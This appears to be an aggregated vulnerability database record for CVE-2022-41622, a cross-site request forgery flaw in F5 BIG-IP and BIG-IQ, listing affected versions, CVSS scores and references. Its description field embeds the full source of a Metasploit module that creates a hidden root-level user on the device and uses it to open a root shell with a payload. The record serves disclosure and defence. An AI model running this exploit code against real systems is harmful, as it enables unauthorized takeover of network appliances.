ID

VAR-202211-1139


CVE

CVE-2022-41622


TITLE

plural  F5 Networks  Cross-site request forgery vulnerability in product

Trust: 0.8

sources: JVNDB: JVNDB-2022-023336

DESCRIPTION

In all versions,  BIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP.    Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated. BIG-IQ Centralized Management , BIG-IP Advanced Firewall Manager (AFM) , BIG-IP Analytics etc. multiple F5 Networks The product contains a cross-site request forgery vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. An attacker may trick users who have at least resource administrator role privilege and are authenticated through basic authentication in iControl SOAP into performing critical actions. An attacker can exploit this vulnerability only through the control plane, not through the data plane. If exploited, the vulnerability can compromise the complete system. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'unix_crypt' class MetasploitModule < Msf::Exploit::Local include Msf::Post::Linux::F5Mcp include Msf::Exploit::CmdStager def initialize(info = {}) super( update_info( info, 'Name' => 'F5 Big-IP Create Admin User', 'Description' => %q{ This creates a local user with a username/password and root-level privileges. Note that a root-level account is not required to do this, which makes it a privilege escalation issue. Note that this is pretty noisy, since it creates a user account and creates log files and such. Additionally, most (if not all) vulnerabilities in F5 grant root access anyways. Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb }, 'License' => MSF_LICENSE, 'Author' => ['Ron Bowes'], 'Platform' => [ 'unix', 'linux', 'python' ], 'SessionTypes' => ['shell', 'meterpreter'], 'References' => [ ['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'], ['URL', 'https://support.f5.com/csp/article/K97843387'], ], 'Privileged' => true, 'DisclosureDate' => '2022-11-16', 'Arch' => [ ARCH_CMD, ARCH_PYTHON ], 'Type' => :unix_cmd, 'Targets' => [[ 'Auto', {} ]], 'Notes' => { 'Stability' => [], 'Reliability' => [], 'SideEffects' => [] } ) ) register_options([ OptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alphanumeric(8)]), OptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(12)]), OptBool.new('CREATE_SESSION', [true, 'If set, use the new account to create a root session', true]), ]) end def exploit # Get or generate the username/password fail_with(Failure::BadConfig, 'USERNAME cannot be empty') if datastore['USERNAME'].empty? username = datastore['USERNAME'] if datastore['CREATE_SESSION'] password = Rex::Text.rand_text_alphanumeric(12) new_password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12) print_status("Will attempt to create user #{username} / #{password}, then change password to #{new_password} when creating a session") else password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12) print_status("Will attempt to create user #{username} / #{password}") end # If the password is already hashed, leave it as-is vprint_status('Hashing the password with SHA512') hashed_password = UnixCrypt::SHA512.build(password) if !hashed_password || hashed_password.empty? fail_with(Failure::BadConfig, 'Failed to hash the password with String.crypt') end # These requests have to go in a single 'session', which, to us, is # a single packet (since we don't have AF_UNIX sockets) result = mcp_send_recv([ # Authenticate as 'admin' (this probably shouldn't work but does) mcp_build('user_authenticated', 'structure', [ mcp_build('user_authenticated_name', 'string', 'admin') ]), # Start transaction mcp_build('start_transaction', 'structure', [ mcp_build('start_transaction_load_type', 'ulong', 0) ]), # Create the role mapping mcp_build('create', 'structure', [ mcp_build('user_role_partition', 'structure', [ mcp_build('user_role_partition_user', 'string', username), mcp_build('user_role_partition_role', 'ulong', 0), mcp_build('user_role_partition_partition', 'string', '[All]'), ]) ]), # Create the userdb entry mcp_build('create', 'structure', [ mcp_build('userdb_entry', 'structure', [ mcp_build('userdb_entry_name', 'string', username), mcp_build('userdb_entry_partition_id', 'string', 'Common'), mcp_build('userdb_entry_is_system', 'ulong', 0), mcp_build('userdb_entry_shell', 'string', '/bin/bash'), mcp_build('userdb_entry_is_crypted', 'ulong', 1), mcp_build('userdb_entry_passwd', 'string', hashed_password), ]) ]), # Finish the transaction mcp_build('end_transaction', 'structure', []) ]) # Handle errors if result.nil? fail_with(Failure::Unknown, 'Request to mcp appeared to fail') end # The only result we really care about is an error error_returned = false result.each do |r| result = mcp_get_single(r, 'result') result_code = mcp_get_single(result, 'result_code') # If there's no code or it's zero, just ignore it if result_code.nil? || result_code == 0 next end # If we're here, an error was returned! error_returned = true # Otherwise, try and get result_message result_message = mcp_get_single(result, 'result_message') if result_message.nil? print_warning("mcp query returned a non-zero result (#{result_code}), but no error message") else print_error("mcp query returned an error message: #{result_message} (code: #{result_code})") end end # Let them know if it likely worked if !error_returned print_good("Service didn't return an error, so user was likely created!") if datastore['CREATE_SESSION'] print_status('Attempting create a root session...') out = cmd_exec("echo -ne \"#{password}\\n#{password}\\n#{new_password}\\n#{new_password}\\n#{payload.encoded}\\n\" | su #{username}") vprint_status("Output from su command: #{out}") end end end end

Trust: 1.89

sources: NVD: CVE-2022-41622 // JVNDB: JVNDB-2022-023336 // VULHUB: VHN-437877 // VULMON: CVE-2022-41622 // PACKETSTORM: 170847

AFFECTED PRODUCTS

vendor:f5model:big-ip analyticsscope:gteversion:15.1.0

Trust: 1.0

vendor:f5model:big-ip application security managerscope:lteversion:14.1.5

Trust: 1.0

vendor:f5model:big-ip local traffic managerscope:gteversion:14.1.0

Trust: 1.0

vendor:f5model:big-ip link controllerscope:eqversion:17.0.0

Trust: 1.0

vendor:f5model:big-ip policy enforcement managerscope:gteversion:16.1.0

Trust: 1.0

vendor:f5model:big-ip policy enforcement managerscope:eqversion:17.0.0

Trust: 1.0

vendor:f5model:big-ip advanced firewall managerscope:gteversion:15.1.0

Trust: 1.0

vendor:f5model:big-ip analyticsscope:gteversion:14.1.0

Trust: 1.0

vendor:f5model:big-ip global traffic managerscope:lteversion:16.1.3

Trust: 1.0

vendor:f5model:big-ip application security managerscope:lteversion:15.1.8

Trust: 1.0

vendor:f5model:big-ip application security managerscope:gteversion:15.1.0

Trust: 1.0

vendor:f5model:big-ip link controllerscope:gteversion:16.1.0

Trust: 1.0

vendor:f5model:big-ip link controllerscope:lteversion:16.1.3

Trust: 1.0

vendor:f5model:big-ip advanced firewall managerscope:gteversion:14.1.0

Trust: 1.0

vendor:f5model:big-ip policy enforcement managerscope:lteversion:13.1.5

Trust: 1.0

vendor:f5model:big-ip policy enforcement managerscope:lteversion:14.1.5

Trust: 1.0

vendor:f5model:big-ip analyticsscope:eqversion:17.0.0

Trust: 1.0

vendor:f5model:big-ip access policy managerscope:gteversion:16.1.0

Trust: 1.0

vendor:f5model:big-ip local traffic managerscope:eqversion:17.0.0

Trust: 1.0

vendor:f5model:big-ip access policy managerscope:lteversion:16.1.3

Trust: 1.0

vendor:f5model:big-ip fraud protection servicescope:gteversion:13.1.0

Trust: 1.0

vendor:f5model:big-ip analyticsscope:gteversion:13.1.0

Trust: 1.0

vendor:f5model:big-ip policy enforcement managerscope:lteversion:15.1.8

Trust: 1.0

vendor:f5model:big-ip policy enforcement managerscope:gteversion:15.1.0

Trust: 1.0

vendor:f5model:big-ip global traffic managerscope:gteversion:15.1.0

Trust: 1.0

vendor:f5model:big-ip analyticsscope:lteversion:13.1.5

Trust: 1.0

vendor:f5model:big-ip domain name systemscope:gteversion:16.1.0

Trust: 1.0

vendor:f5model:big-ip access policy managerscope:lteversion:14.1.5

Trust: 1.0

vendor:f5model:big-ip advanced firewall managerscope:gteversion:13.1.0

Trust: 1.0

vendor:f5model:big-ip local traffic managerscope:lteversion:13.1.5

Trust: 1.0

vendor:f5model:big-ip fraud protection servicescope:gteversion:16.1.0

Trust: 1.0

vendor:f5model:big-ip fraud protection servicescope:eqversion:17.0.0

Trust: 1.0

vendor:f5model:big-ip local traffic managerscope:lteversion:14.1.5

Trust: 1.0

vendor:f5model:big-ip local traffic managerscope:gteversion:16.1.0

Trust: 1.0

vendor:f5model:big-ip advanced firewall managerscope:lteversion:13.1.5

Trust: 1.0

vendor:f5model:big-ip policy enforcement managerscope:gteversion:14.1.0

Trust: 1.0

vendor:f5model:big-ip advanced firewall managerscope:lteversion:14.1.5

Trust: 1.0

vendor:f5model:big-ip link controllerscope:gteversion:15.1.0

Trust: 1.0

vendor:f5model:big-ip application security managerscope:gteversion:13.1.0

Trust: 1.0

vendor:f5model:big-ip access policy managerscope:lteversion:15.1.8

Trust: 1.0

vendor:f5model:big-ip access policy managerscope:gteversion:15.1.0

Trust: 1.0

vendor:f5model:big-ip domain name systemscope:lteversion:13.1.5

Trust: 1.0

vendor:f5model:big-ip domain name systemscope:lteversion:14.1.5

Trust: 1.0

vendor:f5model:big-ip local traffic managerscope:lteversion:15.1.8

Trust: 1.0

vendor:f5model:big-ip fraud protection servicescope:lteversion:13.1.5

Trust: 1.0

vendor:f5model:big-ip link controllerscope:gteversion:14.1.0

Trust: 1.0

vendor:f5model:big-ip application acceleration managerscope:gteversion:16.1.0

Trust: 1.0

vendor:f5model:big-ip fraud protection servicescope:lteversion:14.1.5

Trust: 1.0

vendor:f5model:big-ip advanced firewall managerscope:lteversion:15.1.8

Trust: 1.0

vendor:f5model:big-ip domain name systemscope:lteversion:15.1.8

Trust: 1.0

vendor:f5model:big-ip domain name systemscope:gteversion:15.1.0

Trust: 1.0

vendor:f5model:big-ip global traffic managerscope:gteversion:13.1.0

Trust: 1.0

vendor:f5model:big-ip policy enforcement managerscope:gteversion:13.1.0

Trust: 1.0

vendor:f5model:big-ip fraud protection servicescope:lteversion:15.1.8

Trust: 1.0

vendor:f5model:big-ip fraud protection servicescope:gteversion:15.1.0

Trust: 1.0

vendor:f5model:big-ip application security managerscope:lteversion:13.1.5

Trust: 1.0

vendor:f5model:big-ip local traffic managerscope:gteversion:15.1.0

Trust: 1.0

vendor:f5model:big-ip application acceleration managerscope:lteversion:13.1.5

Trust: 1.0

vendor:f5model:big-ip application acceleration managerscope:lteversion:14.1.5

Trust: 1.0

vendor:f5model:big-ip domain name systemscope:gteversion:14.1.0

Trust: 1.0

vendor:f5model:big-ip global traffic managerscope:gteversion:16.1.0

Trust: 1.0

vendor:f5model:big-ip global traffic managerscope:eqversion:17.0.0

Trust: 1.0

vendor:f5model:big-ip link controllerscope:gteversion:13.1.0

Trust: 1.0

vendor:f5model:big-ip application acceleration managerscope:lteversion:16.1.3

Trust: 1.0

vendor:f5model:big-iq centralized managementscope:eqversion:7.1.0

Trust: 1.0

vendor:f5model:big-iq centralized managementscope:gteversion:8.0.0

Trust: 1.0

vendor:f5model:big-ip fraud protection servicescope:gteversion:14.1.0

Trust: 1.0

vendor:f5model:big-ip access policy managerscope:gteversion:13.1.0

Trust: 1.0

vendor:f5model:big-ip application acceleration managerscope:lteversion:15.1.8

Trust: 1.0

vendor:f5model:big-ip application acceleration managerscope:gteversion:15.1.0

Trust: 1.0

vendor:f5model:big-ip policy enforcement managerscope:lteversion:16.1.3

Trust: 1.0

vendor:f5model:big-ip global traffic managerscope:lteversion:13.1.5

Trust: 1.0

vendor:f5model:big-ip global traffic managerscope:lteversion:14.1.5

Trust: 1.0

vendor:f5model:big-ip access policy managerscope:eqversion:17.0.0

Trust: 1.0

vendor:f5model:big-ip application security managerscope:gteversion:14.1.0

Trust: 1.0

vendor:f5model:big-ip link controllerscope:lteversion:13.1.5

Trust: 1.0

vendor:f5model:big-ip application acceleration managerscope:gteversion:14.1.0

Trust: 1.0

vendor:f5model:big-iq centralized managementscope:lteversion:8.2.0

Trust: 1.0

vendor:f5model:big-ip domain name systemscope:gteversion:13.1.0

Trust: 1.0

vendor:f5model:big-ip link controllerscope:lteversion:14.1.5

Trust: 1.0

vendor:f5model:big-ip local traffic managerscope:gteversion:13.1.0

Trust: 1.0

vendor:f5model:big-ip global traffic managerscope:lteversion:15.1.8

Trust: 1.0

vendor:f5model:big-ip analyticsscope:lteversion:16.1.3

Trust: 1.0

vendor:f5model:big-ip access policy managerscope:lteversion:13.1.5

Trust: 1.0

vendor:f5model:big-ip domain name systemscope:eqversion:17.0.0

Trust: 1.0

vendor:f5model:big-ip link controllerscope:lteversion:15.1.8

Trust: 1.0

vendor:f5model:big-ip local traffic managerscope:lteversion:16.1.3

Trust: 1.0

vendor:f5model:big-ip advanced firewall managerscope:lteversion:16.1.3

Trust: 1.0

vendor:f5model:big-ip advanced firewall managerscope:eqversion:17.0.0

Trust: 1.0

vendor:f5model:big-ip global traffic managerscope:gteversion:14.1.0

Trust: 1.0

vendor:f5model:big-ip analyticsscope:lteversion:14.1.5

Trust: 1.0

vendor:f5model:big-ip application acceleration managerscope:gteversion:13.1.0

Trust: 1.0

vendor:f5model:big-ip analyticsscope:gteversion:16.1.0

Trust: 1.0

vendor:f5model:big-ip application security managerscope:eqversion:17.0.0

Trust: 1.0

vendor:f5model:big-ip domain name systemscope:lteversion:16.1.3

Trust: 1.0

vendor:f5model:big-ip fraud protection servicescope:lteversion:16.1.3

Trust: 1.0

vendor:f5model:big-ip application acceleration managerscope:eqversion:17.0.0

Trust: 1.0

vendor:f5model:big-ip analyticsscope:lteversion:15.1.8

Trust: 1.0

vendor:f5model:big-ip advanced firewall managerscope:gteversion:16.1.0

Trust: 1.0

vendor:f5model:big-ip access policy managerscope:gteversion:14.1.0

Trust: 1.0

vendor:f5model:big-ip application security managerscope:gteversion:16.1.0

Trust: 1.0

vendor:f5model:big-ip application security managerscope:lteversion:16.1.3

Trust: 1.0

vendor:f5model:big-ip link controllerscope: - version: -

Trust: 0.8

vendor:f5model:big-ip advanced firewall managerscope: - version: -

Trust: 0.8

vendor:f5model:big-ip global traffic managerscope: - version: -

Trust: 0.8

vendor:f5model:big-ip local traffic managerscope: - version: -

Trust: 0.8

vendor:f5model:big-iq centralized managementscope: - version: -

Trust: 0.8

vendor:f5model:big-ip access policy managerscope: - version: -

Trust: 0.8

vendor:f5model:big-ip application security managerscope: - version: -

Trust: 0.8

vendor:f5model:big-ip analyticsscope: - version: -

Trust: 0.8

vendor:f5model:big-ip domain name systemscope: - version: -

Trust: 0.8

vendor:f5model:big-ip fraud protection servicescope: - version: -

Trust: 0.8

sources: JVNDB: JVNDB-2022-023336 // NVD: CVE-2022-41622

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2022-41622
value: HIGH

Trust: 1.0

f5sirt@f5.com: CVE-2022-41622
value: HIGH

Trust: 1.0

NVD: CVE-2022-41622
value: HIGH

Trust: 0.8

CNNVD: CNNVD-202211-2929
value: HIGH

Trust: 0.6

nvd@nist.gov: CVE-2022-41622
baseSeverity: HIGH
baseScore: 8.8
vectorString: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 2.8
impactScore: 5.9
version: 3.1

Trust: 2.0

NVD: CVE-2022-41622
baseSeverity: HIGH
baseScore: 8.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: NONE
impactScore: NONE
version: 3.0

Trust: 0.8

sources: JVNDB: JVNDB-2022-023336 // CNNVD: CNNVD-202211-2929 // NVD: CVE-2022-41622 // NVD: CVE-2022-41622

PROBLEMTYPE DATA

problemtype:CWE-352

Trust: 1.1

problemtype:Cross-site request forgery (CWE-352) [NVD evaluation ]

Trust: 0.8

sources: VULHUB: VHN-437877 // JVNDB: JVNDB-2022-023336 // NVD: CVE-2022-41622

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-202211-2929

TYPE

cross-site request forgery

Trust: 0.6

sources: CNNVD: CNNVD-202211-2929

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-437877

PATCH

title:K94221585url:https://my.f5.com/manage/s/article/K94221585

Trust: 0.8

sources: JVNDB: JVNDB-2022-023336

EXTERNAL IDS

db:NVDid:CVE-2022-41622

Trust: 3.5

db:PACKETSTORMid:170847

Trust: 0.8

db:JVNDBid:JVNDB-2022-023336

Trust: 0.8

db:PACKETSTORMid:169967

Trust: 0.7

db:AUSCERTid:ESB-2022.5996

Trust: 0.6

db:CNNVDid:CNNVD-202211-2929

Trust: 0.6

db:VULHUBid:VHN-437877

Trust: 0.1

db:VULMONid:CVE-2022-41622

Trust: 0.1

sources: VULHUB: VHN-437877 // VULMON: CVE-2022-41622 // JVNDB: JVNDB-2022-023336 // PACKETSTORM: 170847 // CNNVD: CNNVD-202211-2929 // NVD: CVE-2022-41622

REFERENCES

url:https://support.f5.com/csp/article/k94221585

Trust: 1.8

url:https://nvd.nist.gov/vuln/detail/cve-2022-41622

Trust: 0.9

url:https://packetstormsecurity.com/files/169967/f5-big-ip-icontrol-cross-site-request-forgery.html

Trust: 0.7

url:https://packetstormsecurity.com/files/170847/f5-big-ip-create-administrative-user.html

Trust: 0.6

url:https://cxsecurity.com/cveshow/cve-2022-41622/

Trust: 0.6

url:https://vigilance.fr/vulnerability/f5-big-ip-cross-site-request-forgery-via-icontrol-soap-39927

Trust: 0.6

url:https://www.auscert.org.au/bulletins/esb-2022.5996

Trust: 0.6

url:https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],

Trust: 0.1

url:https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb

Trust: 0.1

url:https://github.com/rapid7/metasploit-framework

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2022-41800

Trust: 0.1

url:https://support.f5.com/csp/article/k97843387'],

Trust: 0.1

url:https://metasploit.com/download

Trust: 0.1

url:https://github.com/rbowes-r7/refreshing-mcp-tool'],

Trust: 0.1

sources: VULHUB: VHN-437877 // VULMON: CVE-2022-41622 // JVNDB: JVNDB-2022-023336 // PACKETSTORM: 170847 // CNNVD: CNNVD-202211-2929 // NVD: CVE-2022-41622

CREDITS

Ron Bowes

Trust: 0.1

sources: PACKETSTORM: 170847

SOURCES

db:VULHUBid:VHN-437877
db:VULMONid:CVE-2022-41622
db:JVNDBid:JVNDB-2022-023336
db:PACKETSTORMid:170847
db:CNNVDid:CNNVD-202211-2929
db:NVDid:CVE-2022-41622

LAST UPDATE DATE

2024-08-14T15:11:12.119000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-437877date:2022-12-08T00:00:00
db:JVNDBid:JVNDB-2022-023336date:2023-11-28T06:00:00
db:CNNVDid:CNNVD-202211-2929date:2023-02-06T00:00:00
db:NVDid:CVE-2022-41622date:2023-11-07T03:52:51.043

SOURCES RELEASE DATE

db:VULHUBid:VHN-437877date:2022-12-07T00:00:00
db:JVNDBid:JVNDB-2022-023336date:2023-11-28T00:00:00
db:PACKETSTORMid:170847date:2023-02-03T14:49:22
db:CNNVDid:CNNVD-202211-2929date:2022-11-16T00:00:00
db:NVDid:CVE-2022-41622date:2022-12-07T04:15:10.333